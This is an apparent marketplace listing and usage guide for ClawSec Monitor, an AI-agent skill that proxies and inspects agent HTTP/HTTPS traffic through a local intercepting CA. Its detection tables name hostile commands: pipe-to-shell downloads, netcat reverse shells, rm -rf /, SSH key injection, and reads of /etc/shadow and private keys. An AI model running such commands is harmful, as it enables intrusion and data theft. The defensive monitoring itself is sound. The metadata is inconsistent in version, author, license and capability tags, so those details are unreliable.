
Clawsec Monitor

Author: funsaized · GitHub ↗ · v1.0.0 · MIT-0
cross-platform ⚠ pending
Total downloads: 92
Favorites: 0
Current installs: 0
Versions: 1
Install in OpenClaw
/install clawsec-monitor
Description
Intercepts and logs AI agent HTTP/HTTPS traffic, detecting secret leaks, sensitive file reads, and command injection in both directions automatically.
Usage instructions (SKILL.md)

clawsec

ClawSec Monitor v3.0 — See what your AI agents are really doing.

A transparent HTTP/HTTPS proxy that intercepts, inspects, and logs all AI agent traffic. Detects secrets being leaked, sensitive files being read, and command injection — automatically, in both directions.


Source & verification

All code lives in this repository. Before running anything, clone and verify:

git clone https://github.com/chrisochrisochriso-cmyk/clawsec-monitor
cd clawsec-monitor

# Verify file integrity against published checksums
shasum -a 256 -c <<'EOF'
71038919afa9978e2c16a4c8113b842abd992a99bebc63f677365f16812950b0  clawsec-monitor.py
dfb2c3f145ec8713ffe7799088dda1d6c93deb9d26dbb5a999425f34c467abfc  run_tests.py
f899e2d640b59fdd46c52828c460d8d2a515d7e24220b91a0e87162923c99fda  Dockerfile.clawsec
a005a2c259d78c14caeb29553ad0be7287c0608aad8e794a7b687b1e44d3a956  docker-compose.clawsec.yml
f685c09ecf0ad8034b1fa1fbe7e610bbf838fcec373795d7afe56dd2055e0d25  requirements.clawsec.txt
EOF

All files must print OK. Do not proceed if any checksum fails.


Bundled files

File                         Purpose
clawsec-monitor.py           Main proxy script (Python 3.12, 876 lines)
run_tests.py                 28-test regression suite
Dockerfile.clawsec           Python 3.12-slim container image
docker-compose.clawsec.yml   One-command deployment
requirements.clawsec.txt     Single dependency: cryptography>=42.0.0

Install

pip install cryptography

That is the only external dependency. No other packages are required.


Start

# Foreground — Ctrl-C or SIGTERM stops it cleanly
python3 clawsec-monitor.py start

# Without HTTPS interception (no CA needed)
python3 clawsec-monitor.py start --no-mitm

# Custom config
python3 clawsec-monitor.py start --config config.json

Route agent traffic

Set these environment variables in the specific process you want to monitor — not system-wide:

export HTTP_PROXY=http://127.0.0.1:8888
export HTTPS_PROXY=http://127.0.0.1:8888

This scopes interception to that process only.


HTTPS interception (optional)

ClawSec generates a local CA on first start at /tmp/clawsec/ca.crt.

Preferred: per-process trust (no system changes, no sudo)

export REQUESTS_CA_BUNDLE=/tmp/clawsec/ca.crt   # Python requests
export SSL_CERT_FILE=/tmp/clawsec/ca.crt         # httpx / httpcore
export NODE_EXTRA_CA_CERTS=/tmp/clawsec/ca.crt   # Node.js
export CURL_CA_BUNDLE=/tmp/clawsec/ca.crt         # curl

If system-wide trust is needed (requires sudo, review carefully):

# macOS
sudo security add-trusted-cert -d -r trustRoot \
  -k /Library/Keychains/System.keychain /tmp/clawsec/ca.crt

# Ubuntu / Debian
sudo cp /tmp/clawsec/ca.crt /usr/local/share/ca-certificates/clawsec.crt
sudo update-ca-certificates

The CA private key is stored at /tmp/clawsec/ca.key (mode 0600, directory 0700). It never leaves your machine. Treat it like any TLS private key. Use --no-mitm if you do not want HTTPS interception at all.
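A check that the modes stated above actually hold before the CA is trusted, as an added example that is not part of ClawSec. The function name check_ca_dir is hypothetical, and it uses lstat so that a symlink at either path is reported instead of followed.

```python
import os
import stat


def check_ca_dir(log_dir="/tmp/clawsec"):
    """Return a list of problems; an empty list means the stated modes hold."""
    problems = []
    key = os.path.join(log_dir, "ca.key")
    # Expected modes come from the text above: directory 0700, key 0600.
    for path, want, is_kind in ((log_dir, 0o700, stat.S_ISDIR),
                                (key, 0o600, stat.S_ISREG)):
        try:
            st = os.lstat(path)  # lstat: do not follow a symlink at this path
        except FileNotFoundError:
            problems.append(f"{path}: missing")
            continue
        if not is_kind(st.st_mode):
            problems.append(f"{path}: unexpected file type")
            continue
        mode = stat.S_IMODE(st.st_mode)
        if mode != want:
            problems.append(f"{path}: mode {mode:04o}, expected {want:04o}")
        if st.st_uid != os.getuid():
            problems.append(f"{path}: owned by uid {st.st_uid}, not the current user")
    return problems


if __name__ == "__main__":
    for line in check_ca_dir() or ["ok: directory and key match the stated modes"]:
        print(line)
```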


Commands

python3 clawsec-monitor.py stop              # graceful shutdown
python3 clawsec-monitor.py status            # running/stopped + last 5 threats
python3 clawsec-monitor.py threats           # last 10 threats as JSON
python3 clawsec-monitor.py threats --limit N

Detection patterns

EXFIL (data leaving the agent)

Pattern          Matches
ai_api_key       sk-ant-*, sk-live-*, sk-gpt-*, sk-pro-*
aws_access_key   AKIA*, ASIA*
private_key_pem  -----BEGIN RSA/OPENSSH/EC/DSA PRIVATE KEY-----
ssh_key_file     .ssh/id_rsa, .ssh/id_ed25519, .ssh/authorized_keys
unix_sensitive   /etc/passwd, /etc/shadow, /etc/sudoers
dotenv_file      /.env, /.aws/credentials
ssh_pubkey       ssh-rsa <key> (40+ chars)

INJECTION (commands arriving at the agent)

Pattern          Matches
pipe_to_shell    curl <url> | bash, wget <url> | sh
shell_exec       bash -c "...", sh -i "..."
reverse_shell    nc <host> <port>, netcat, ncat
destructive_rm   rm -rf /
ssh_key_inject   echo ssh-rsa (SSH key injection)
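To show how rules like these fire and why plain documentation text can trigger them, here is an added example that is not taken from clawsec-monitor.py. The regular expressions are approximations of the two tables, and the scan function, its 80-character context offset and the sample messages are assumptions made for illustration.

```python
import re

# Approximations of the two tables above, written for this example; the real
# expressions inside clawsec-monitor.py are not shown on this page.
RULES = {
    ("EXFIL", "ai_api_key"): r"\bsk-(?:ant|live|gpt|pro)-[A-Za-z0-9_-]{8,}",
    ("EXFIL", "aws_access_key"): r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b",
    ("EXFIL", "private_key_pem"): r"-----BEGIN (?:RSA|OPENSSH|EC|DSA) PRIVATE KEY-----",
    ("EXFIL", "ssh_key_file"): r"\.ssh/(?:id_rsa|id_ed25519|authorized_keys)\b",
    ("EXFIL", "unix_sensitive"): r"/etc/(?:passwd|shadow|sudoers)\b",
    ("EXFIL", "dotenv_file"): r"/\.env\b|/\.aws/credentials\b",
    ("EXFIL", "ssh_pubkey"): r"\bssh-rsa [A-Za-z0-9+/=]{40,}",
    ("INJECTION", "pipe_to_shell"): r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b",
    ("INJECTION", "shell_exec"): r"\b(?:bash -c|sh -i)\b",
    ("INJECTION", "reverse_shell"): r"\b(?:nc|netcat|ncat)\s+\S+\s+\d+\b",
    ("INJECTION", "destructive_rm"): r"\brm\s+-rf\s+/",
    ("INJECTION", "ssh_key_inject"): r"\becho\s+\W?ssh-rsa\b",
}
COMPILED = {key: re.compile(rx) for key, rx in RULES.items()}


def scan(payload, direction, dest, max_scan_bytes=65536):
    """Return one finding per rule that fires, shaped like a threats.jsonl entry."""
    # Assumption: max_scan_bytes caps how much of each message body is inspected.
    text = payload[:max_scan_bytes].decode("utf-8", errors="replace")
    findings = []
    for (threat_type, pattern), rx in COMPILED.items():
        m = rx.search(text)
        if m:
            start = max(0, m.start() - 80)  # keep some context before the match
            findings.append({"direction": direction, "threat_type": threat_type,
                             "pattern": pattern, "dest": dest,
                             "snippet": text[start:start + 200]})
    return findings


# Constructed sample messages (not captured traffic).
OUTBOUND = b"POST /v1/messages HTTP/1.1\r\nAuthorization: Bearer sk-ant-api01-EXAMPLE0000EXAMPLE\r\n\r\n{}"
INBOUND = b"To install, run: curl https://example.invalid/install.sh | bash"
DOC_PAGE = b"On Linux, local accounts are listed in /etc/passwd."  # benign, still matches

if __name__ == "__main__":
    for msg, direction in ((OUTBOUND, "outbound"), (INBOUND, "inbound"), (DOC_PAGE, "inbound")):
        for f in scan(msg, direction, "example.invalid:443"):
            print(f["direction"], f["threat_type"], f["pattern"])
```

The DOC_PAGE message is the kind of context noise that shows up as a false positive: the rule matches the path string, not an actual file read.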

Threat log format

/tmp/clawsec/threats.jsonl — one JSON object per line:

{
  "direction":   "outbound",
  "protocol":    "https",
  "threat_type": "EXFIL",
  "pattern":     "ai_api_key",
  "snippet":     "Authorization: Bearer sk-ant-api01-...",
  "source":      "127.0.0.1",
  "dest":        "api.anthropic.com:443",
  "timestamp":   "2026-02-19T13:41:59.587248+00:00"
}
  • direction: outbound (agent → internet) or inbound (internet → agent)
  • threat_type: EXFIL or INJECTION
  • pattern: named rule that fired (see tables above)
  • snippet: up to 200 chars of surrounding context

Deduplication: same (pattern, dest, direction) suppressed for 60 seconds. Rotating log also at /tmp/clawsec/clawsec.log (10 MB × 3 backups).
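A triage pass over threats.jsonl, as an added example that is not part of ClawSec. It groups entries by the same (pattern, dest, direction) key used for deduplication and tolerates a half-written last line. The triage function, the expected mapping of patterns to known-good destinations, and the layout of the inbound sample entry are assumptions.

```python
import json
from collections import defaultdict
from datetime import datetime

# Constructed sample in the threats.jsonl shape shown above (not real output).
SAMPLE = """\
{"direction":"outbound","protocol":"https","threat_type":"EXFIL","pattern":"ai_api_key","snippet":"Authorization: Bearer sk-ant-api01-...","source":"127.0.0.1","dest":"api.anthropic.com:443","timestamp":"2026-02-19T13:41:59.587248+00:00"}
{"direction":"outbound","protocol":"https","threat_type":"EXFIL","pattern":"ai_api_key","snippet":"Authorization: Bearer sk-ant-api01-...","source":"127.0.0.1","dest":"api.anthropic.com:443","timestamp":"2026-02-19T13:43:10.000000+00:00"}
{"direction":"outbound","protocol":"http","threat_type":"EXFIL","pattern":"aws_access_key","snippet":"key=AKIA...","source":"127.0.0.1","dest":"paste.example.invalid:80","timestamp":"2026-02-19T13:44:02.000000+00:00"}
{"direction":"inbound","protocol":"https","threat_type":"INJECTION","pattern":"pipe_to_shell","snippet":"curl ... | bash","source":"127.0.0.1","dest":"docs.example.invalid:443","timestamp":"2026-02-19T13:45:30.000000+00:00"}
{"direction":"outbound","protocol":"https","thr
"""


def triage(lines, expected):
    """Group entries by the dedup key; return (report, skipped_line_count)."""
    groups, skipped = defaultdict(list), 0
    for line in lines:
        if not line.strip():
            continue
        try:
            e = json.loads(line)
            key = (e["pattern"], e["dest"], e["direction"])
            groups[key].append((datetime.fromisoformat(e["timestamp"]), e["threat_type"]))
        except (ValueError, KeyError, TypeError):
            skipped += 1  # partial write at the tail of a live log, or a foreign line
    report = []
    for (pattern, dest, direction), hits in groups.items():
        times = sorted(t for t, _ in hits)
        known = direction == "outbound" and dest in expected.get(pattern, ())
        report.append({
            "pattern": pattern, "dest": dest, "direction": direction,
            "threat_type": hits[0][1],
            # Repeats inside the dedup window are not logged: this is a lower bound.
            "logged": len(hits),
            "first": times[0].isoformat(), "last": times[-1].isoformat(),
            "verdict": "expected" if known else "review",
        })
    report.sort(key=lambda r: (r["verdict"] != "review", -r["logged"]))
    return report, skipped


if __name__ == "__main__":
    rows, bad = triage(SAMPLE.splitlines(), {"ai_api_key": {"api.anthropic.com:443"}})
    for r in rows:
        print(r["verdict"], r["direction"], r["pattern"], r["dest"], r["logged"])
    print("skipped lines:", bad)
```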


Config reference

{
  "proxy_host":          "127.0.0.1",
  "proxy_port":          8888,
  "log_dir":             "/tmp/clawsec",
  "log_level":           "INFO",
  "max_scan_bytes":      65536,
  "enable_mitm":         true,
  "dedup_window_secs":   60
}

Docker

docker compose -f docker-compose.clawsec.yml up -d
docker exec clawsec tail -f /tmp/clawsec/threats.jsonl
docker compose -f docker-compose.clawsec.yml down

The CA persists in the clawsec_data volume across restarts.


Test suite

python3 run_tests.py   # 28/28 tests, ~5 seconds

How to help the user

When /clawsec is invoked, work out what the user needs and assist accordingly:

  1. First run — verify checksums, install cryptography, start the monitor, confirm port 8888 is listening
  2. Interpreting threats — run threats, explain each finding: what pattern fired, which direction, what destination, severity assessment
  3. HTTPS MITM not working — check status for MITM ON; verify the correct CA trust env var is set for the agent runtime; confirm HTTP_PROXY/HTTPS_PROXY are in the agent's environment
  4. False positive — explain which pattern fired and the surrounding snippet; identify whether it is a genuine match or context noise
  5. Docker deploy — verify checksums, build image, run compose, confirm healthcheck passes
  6. No threats appearing — confirm HTTP_PROXY is set in the agent process, check clawsec.log for bind/TLS errors, verify threats.jsonl is being written
  7. Stopping / cleanup: stop, optionally remove /tmp/clawsec directory and uninstall the CA from the trust store

Always run python3 clawsec-monitor.py status first before troubleshooting.


Author: Chris Alley (paperknight)
Source: https://github.com/chrisochrisochriso-cmyk/clawsec-monitor
License: MIT

Capability tags
crypto, requires-wallet, requires-oauth-token, requires-sensitive-credentials
How to use
  1. Make sure OpenClaw is installed (local or Docker deployment)
  2. Enter the install command in the chat box: /install clawsec-monitor
  3. After installation, call the Skill by name or trigger it with /clawsec-monitor
  4. Provide the required inputs according to the Skill's parameter description to get structured output
Version history
v1.0.0
ClawSec Monitor v1.0.0 initial release:
  • Transparent HTTP/HTTPS proxy for intercepting, inspecting, and logging all AI agent traffic.
  • Automatic detection of secrets leakage, sensitive file access, and command injection both inbound and outbound.
  • Per-process proxy configuration and local CA for optional HTTPS interception.
  • Easy install with a single Python dependency (`cryptography`).
  • Threats and activity logged to `/tmp/clawsec/threats.jsonl` with deduplication.
  • Docker support and 28-test regression suite included.
Metadata
Slug: clawsec-monitor
Version: 1.0.0
License: MIT-0
Total installs: 0
Current installs: 0
Historical versions: 1
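FAQ

What is Clawsec Monitor?

Intercepts and logs AI agent HTTP/HTTPS traffic, detecting secret leaks, sensitive file reads, and command injection in both directions automatically. It is an AI Agent Skill plugin for Claude Code / OpenClaw, with 92 total downloads to date.

How do I install Clawsec Monitor?

Run the command "/install clawsec-monitor" in the OpenClaw or Claude Code chat box for a one-click install; no additional configuration is needed.

Is Clawsec Monitor free?

Yes, Clawsec Monitor is completely free. It is released under the MIT-0 license and can be freely downloaded, installed, and used.

Which platforms does Clawsec Monitor support?

Clawsec Monitor runs cross-platform and can be used in any environment where OpenClaw / Claude Code is deployed (cross-platform).

Who developed Clawsec Monitor?

It is developed and maintained by funsaized (@funsaized); the current version is v1.0.0.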
